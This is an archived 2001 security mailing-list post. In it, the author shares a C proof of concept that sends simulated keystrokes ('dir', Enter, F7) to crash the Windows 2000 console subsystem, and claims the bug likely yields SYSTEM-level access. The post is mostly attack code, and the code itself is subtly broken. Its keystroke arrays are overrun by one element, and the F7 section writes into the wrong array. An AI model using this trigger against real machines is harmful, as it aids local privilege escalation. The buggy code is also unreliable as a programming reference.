Vulnerability Development: RE: bug w2k

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

RE: bug w2k

From: "Vladimir Kraljevic" <vladimir_kraljevic () llbudapest hu>
Date: Wed, 1 Aug 2001 10:11:52 +0200

It works with the simulated keystrokes as well... I was able to track it
down up to the point where subsystem crashes, but I have no more time to
spend on it.

I was able to get access violation system box and delay the restart;
everyone with decent kernel debugger (SoftICE and kinds) can trace the exact
point of the crash. I'm pretty sure that you are getting system account. If
I'm right, we'll soon have nice exploit, usefull to anyone that has access
to the CLI.

Enough for now, some work will follow, have some ideas

Vladimir

P.S. You can repeat last two lines (SendInput(...))

=============================================================CUT HERE

#define _WIN32_WINNT    0x0401
#include <windows.h>
#include <winuser.h>
#include <winnt.h>

void main(int argc, char *argv[])
{
        //Simulate "dir\n"

        INPUT inDirStrokes[7];
        memset(inDirStrokes, 0, sizeof(inDirStrokes));

        inDirStrokes[0].type=INPUT_KEYBOARD;
        inDirStrokes[0].ki.dwFlags=0;
        inDirStrokes[0].ki.wVk=VkKeyScan('d');
        inDirStrokes[1].type=INPUT_KEYBOARD;
        inDirStrokes[1].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[1].ki.wVk=VkKeyScan('d');

        inDirStrokes[2].type=INPUT_KEYBOARD;
        inDirStrokes[2].ki.dwFlags=0;
        inDirStrokes[2].ki.wVk=VkKeyScan('i');
        inDirStrokes[3].type=INPUT_KEYBOARD;
        inDirStrokes[3].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[3].ki.wVk=VkKeyScan('i');

        inDirStrokes[4].type=INPUT_KEYBOARD;
        inDirStrokes[4].ki.dwFlags=0;
        inDirStrokes[4].ki.wVk=VkKeyScan('r');
        inDirStrokes[5].type=INPUT_KEYBOARD;
        inDirStrokes[5].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[5].ki.wVk=VkKeyScan('r');

        inDirStrokes[6].type=INPUT_KEYBOARD;
        inDirStrokes[6].ki.dwFlags=0;
        inDirStrokes[6].ki.wVk=VK_RETURN;
        inDirStrokes[7].type=INPUT_KEYBOARD;
        inDirStrokes[7].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[7].ki.wVk=VK_RETURN;

        //Simulate "<F7>\n"

        INPUT inF7Strokes[4];
        memset(inF7Strokes, 0, sizeof(inF7Strokes));

        inF7Strokes[0].type=INPUT_KEYBOARD;
        inF7Strokes[0].ki.dwFlags=0;
        inF7Strokes[0].ki.wVk=VK_F7;
        inF7Strokes[1].type=INPUT_KEYBOARD;
        inF7Strokes[1].ki.dwFlags=KEYEVENTF_KEYUP;
        inF7Strokes[1].ki.wVk=VK_F7;

        inDirStrokes[2].type=INPUT_KEYBOARD;
        inDirStrokes[2].ki.dwFlags=0;
        inDirStrokes[2].ki.wVk=VK_RETURN;
        inDirStrokes[3].type=INPUT_KEYBOARD;
        inDirStrokes[3].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[3].ki.wVk=VK_RETURN;

        SendInput(sizeof(inDirStrokes)/sizeof(inDirStrokes[0]), inDirStrokes,
sizeof(INPUT));
        SendInput(sizeof(inF7Strokes)/sizeof(inF7Strokes[0]), inF7Strokes,
sizeof(INPUT));
}

=============================================================CUT HERE

By Date By Thread

Current thread:

RE: bug w2k Vladimir Kraljevic (Aug 01)